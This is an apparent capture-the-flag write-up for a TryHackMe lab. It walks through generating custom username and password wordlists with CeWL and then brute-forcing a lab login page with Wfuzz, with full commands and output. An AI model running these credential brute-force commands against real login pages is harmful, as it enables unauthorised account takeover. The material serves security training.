Day 4
This room is a simple introfuction to the Linux tool CeWL. CeWL (pronounced "cool") is a custom word list generator tool that spiders websites to create word lists based on the site's content
Learning Objectives
What is CeWL?
What are the capabilities of CeWL?
How can we leverage CeWL to generate a custom wordlist from a website?
How can we customise the tool's output for specific tasks?
The room is a very straightforward introduction to the tool with all the commands given.
CeWL is a wordlist generator that is unique compared to other tools available. While many tools rely on pre-defined lists or common dictionary attacks, CeWL creates custom wordlists based on web page content.
We start with making a basic wordlist from the website and output it into a file
┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ cewl http://10.10.126.196 -w output.txt
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
The contents of the file is a world list as follows.
└─$ cat output.txt
Start
End
and
the
AntarctiCrafts
our
Stylesheet
.
.
.
Visit
office
Send
Message
Login
Submit
CeWL provides a lot of options that allow you to tailor the wordlist to your needs:
Specify spidering depth: The
-d
option allows you to set how deep CeWL should spider. For example, to spider two links deep:cewl http://machine_ip -d 2 -w output1.txt
Set minimum and maximum word length: Use the
-m
and-x
options respectively. For instance, to get words between 5 and 10 characters:cewl http://machine_ip -m 5 -x 10 -w output2.txt
Handle authentication: If the target site is behind a login, you can use the
-a
flag for form-based authentication.Custom extensions: The
--with-numbers
option will append numbers to words, and using--extension
allows you to append custom extensions to each word, making it useful for directory or file brute-forcing.Follow external links: By default, CeWL doesn't spider external sites, but using the
--offsite
option allows you to do so.
For this room we need to gain access to the portal located at http://machine_ip/login.php

We first create a username and password list based on the website.
Username List:
┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ cewl -d 0 -m 5 -w usernames.txt http://10.10.126.196/team.php --lowercase
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ cat usernames.txt
antarcticrafts
stylesheet
start
members
officer
.
.
.
links
rights
reserved
Password List:
┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ cewl -d 2 -m 5 -w passwords.txt http://10.10.126.196 --with-numbers
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ cat passwords.txt
Start
AntarctiCrafts
Stylesheet
About
.
.
.
Message
Login
Submit
No we can attempt to brute force the login page with Wfuzz.
Wfuzz is a tool designed for brute-forcing web applications. It can be used to find resources not linked directories, servlets, scripts, etc, brute-force GET and POST parameters for checking different kinds of injections (SQL, XSS, LDAP), brute-force forms parameters (user/password) and fuzzing.
┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ wfuzz -c -z file,usernames.txt -z file,passwords.txt --hs "Please enter the correct credentials" -u http://10.10.126.196/login.php -d "username=FUZZ&password=FUZ2Z"
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.126.196/login.php
Total requests: 9361
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000006317: 302 118 L 297 W 4442 Ch "[REDACTED] - [REDACTED]"
Total time: 0
Processed Requests: 9361
Filtered Requests: 9360
Requests/sec.: 0
We now have our username and password. We can proceed to login to the portal.

We can see this is a mailbox and the flag can be found here.
Last updated
Was this helpful?